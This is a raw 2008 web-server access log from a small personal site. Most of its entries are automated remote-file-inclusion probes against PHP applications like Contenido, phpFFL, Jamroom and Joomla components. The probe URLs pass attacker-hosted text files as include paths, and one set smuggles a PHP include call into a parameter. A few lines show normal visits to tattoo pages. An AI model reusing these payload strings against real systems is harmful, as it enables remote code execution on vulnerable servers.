69.10.154.65 - - [23/Aug/2008:23:18:25 -0500] "GET /logs/access_log.1214438400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:23:18:27 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
202.228.204.130 - - [23/Aug/2008:23:18:57 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
202.228.204.130 - - [23/Aug/2008:23:18:57 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
202.228.204.130 - - [23/Aug/2008:23:18:57 -0500] "GET //ashnews.php?pathtoashnews=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
202.228.204.130 - - [23/Aug/2008:23:18:57 -0500] "GET //ashnews.php?pathtoashnews=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
202.228.204.130 - - [23/Aug/2008:23:18:58 -0500] "GET /logs///vwar/backup/errors.php?error=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.228.204.130 - - [23/Aug/2008:23:18:58 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
202.228.204.130 - - [23/Aug/2008:23:18:58 -0500] "GET ///vwar/backup/errors.php?error=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
86.58.154.237 - - [23/Aug/2008:23:19:05 -0500] "GET /logs/access_log.1214179200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
202.228.204.130 - - [23/Aug/2008:23:19:08 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
63.243.44.3 - - [23/Aug/2008:23:19:16 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
63.243.44.3 - - [23/Aug/2008:23:19:16 -0500] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
76.195.200.137 - - [23/Aug/2008:23:19:53 -0500] "GET /logs/index.php?spage=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
76.195.200.137 - - [23/Aug/2008:23:19:53 -0500] "GET /index.php?spage=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
213.248.62.98 - - [23/Aug/2008:23:19:56 -0500] "GET /logs/access_log.1214438400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
87.248.163.41 - - [23/Aug/2008:23:20:13 -0500] "GET //ashnews.php?pathtoashnews=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
87.248.163.41 - - [23/Aug/2008:23:20:13 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.232.68.10 - - [23/Aug/2008:23:21:26 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
77.232.68.10 - - [23/Aug/2008:23:21:26 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
77.232.68.10 - - [23/Aug/2008:23:21:26 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
80.57.81.49 - - [23/Aug/2008:23:21:42 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 367 "-""libwww-perl/5.803"
80.57.81.49 - - [23/Aug/2008:23:21:42 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
80.57.81.49 - - [23/Aug/2008:23:21:43 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
200.150.189.10 - - [23/Aug/2008:23:23:52 -0500] "GET //ashnews.php?pathtoashnews=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
200.150.189.10 - - [23/Aug/2008:23:23:52 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
213.248.62.98 - - [23/Aug/2008:23:26:17 -0500] "GET /logs/access_log.1214179200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
86.58.154.237 - - [23/Aug/2008:23:26:31 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
220.125.208.12 - - [23/Aug/2008:23:27:16 -0500] "GET /logs/access_log.1214524800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:23:27:16 -0500] "GET /logs/access_log.1214524800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:23:27:17 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:23:27:17 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:23:27:17 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:23:27:17 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
69.10.154.65 - - [23/Aug/2008:23:27:25 -0500] "GET /logs/access_log.1214179200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
77.232.68.10 - - [23/Aug/2008:23:28:26 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:28:32 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:28:32 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:28:33 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
220.125.208.12 - - [23/Aug/2008:23:29:24 -0500] "GET /logs/access_log.1214179200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:23:29:24 -0500] "GET /logs/access_log.1214179200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.65"
77.232.68.10 - - [23/Aug/2008:23:30:07 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:30:14 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:30:14 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:30:14 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
80.57.81.49 - - [23/Aug/2008:23:30:41 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 367 "-""libwww-perl/5.803"
80.93.62.114 - - [23/Aug/2008:23:31:34 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:31:36 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
80.57.81.49 - - [23/Aug/2008:23:32:15 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 367 "-""libwww-perl/5.803"
216.206.238.35 - - [23/Aug/2008:23:32:17 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
216.206.238.35 - - [23/Aug/2008:23:32:17 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
208.116.1.202 - - [23/Aug/2008:23:32:52 -0500] "GET /logs/access_log.1206489600/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
208.116.1.202 - - [23/Aug/2008:23:32:52 -0500] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
208.116.1.202 - - [23/Aug/2008:23:32:52 -0500] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
69.10.154.65 - - [23/Aug/2008:23:33:25 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
213.248.62.98 - - [23/Aug/2008:23:33:50 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
96.3.74.76 - - [23/Aug/2008:23:34:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
96.3.74.76 - - [23/Aug/2008:23:34:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
96.3.74.76 - - [23/Aug/2008:23:34:02 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
96.3.74.76 - - [23/Aug/2008:23:34:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
91.186.15.66 - - [23/Aug/2008:23:34:40 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
91.186.15.66 - - [23/Aug/2008:23:34:40 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
66.187.101.26 - - [23/Aug/2008:23:36:07 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/chua_glt/siswainjector.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
66.187.101.26 - - [23/Aug/2008:23:36:12 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/chua_glt/siswainjector.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
80.93.62.114 - - [23/Aug/2008:23:36:27 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:37:38 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
93.190.137.238 - - [23/Aug/2008:23:38:03 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
93.190.137.238 - - [23/Aug/2008:23:38:04 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
80.93.62.114 - - [23/Aug/2008:23:38:15 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:39:31 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
66.187.101.26 - - [23/Aug/2008:23:40:48 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.geocities.com/chua_glt/siswainjector.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
66.187.101.26 - - [23/Aug/2008:23:40:53 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.geocities.com/chua_glt/siswainjector.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
69.10.154.65 - - [23/Aug/2008:23:43:40 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
69.10.154.65 - - [23/Aug/2008:23:43:40 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
74.200.71.114 - - [23/Aug/2008:23:44:46 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
74.200.71.114 - - [23/Aug/2008:23:44:46 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
86.58.154.237 - - [23/Aug/2008:23:44:59 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
86.58.154.237 - - [23/Aug/2008:23:44:59 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
80.67.20.130 - - [23/Aug/2008:23:45:15 -0500] "GET /logs/inurl:%22com_dbquery%22http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 355 "-""libwww-perl/5.808"
80.67.20.130 - - [23/Aug/2008:23:45:15 -0500] "GET /inurl:%22com_dbquery%22http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 350 "-""libwww-perl/5.808"
213.248.62.98 - - [23/Aug/2008:23:48:19 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
213.248.62.98 - - [23/Aug/2008:23:48:19 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
74.6.8.121 - - [23/Aug/2008:23:54:16 -0500] "GET /logs/access_log.1189555200 HTTP/1.0" 200 324445 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.116.1.202 - - [23/Aug/2008:23:55:17 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
208.116.1.202 - - [23/Aug/2008:23:55:17 -0500] "GET /modules/My_eGallery/index.php?basepath=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
208.116.1.202 - - [23/Aug/2008:23:55:17 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
217.171.66.245 - - [23/Aug/2008:23:56:24 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [23/Aug/2008:23:56:24 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [23/Aug/2008:23:56:24 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 332 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
217.171.66.245 - - [23/Aug/2008:23:56:24 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
65.214.44.28 - - [23/Aug/2008:23:57:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [23/Aug/2008:23:57:17 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [23/Aug/2008:23:57:17 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
85.214.88.11 - - [23/Aug/2008:23:57:24 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.214.88.11 - - [23/Aug/2008:23:57:24 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 332 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.214.88.11 - - [23/Aug/2008:23:57:24 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
85.214.88.11 - - [23/Aug/2008:23:57:24 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
217.171.66.245 - - [24/Aug/2008:00:03:00 -0500] "GET /errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:00:03:00 -0500] "GET /logs/errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:00:03:01 -0500] "GET /errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
217.171.66.245 - - [24/Aug/2008:00:03:01 -0500] "GET /logs/errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
85.214.88.11 - - [24/Aug/2008:00:06:13 -0500] "GET /errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.214.88.11 - - [24/Aug/2008:00:06:13 -0500] "GET /logs/errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.214.88.11 - - [24/Aug/2008:00:06:13 -0500] "GET /errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
85.214.88.11 - - [24/Aug/2008:00:06:13 -0500] "GET /logs/errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
80.67.20.130 - - [24/Aug/2008:00:09:20 -0500] "GET /logs/inurl:%22com_dbquery%22http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 355 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:14:18 -0500] "GET /inurl:%22com_dbquery%22http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 350 "-""libwww-perl/5.808"
59.106.19.213 - - [24/Aug/2008:00:14:57 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dj-kelly.com/guestbook////log/idscan8?? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
59.106.19.213 - - [24/Aug/2008:00:14:57 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dj-kelly.com/guestbook////log/idscan8?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
216.139.67.90 - - [24/Aug/2008:00:16:21 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.64"
216.139.67.90 - - [24/Aug/2008:00:16:21 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.64"
217.171.66.245 - - [24/Aug/2008:00:18:41 -0500] "GET /errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
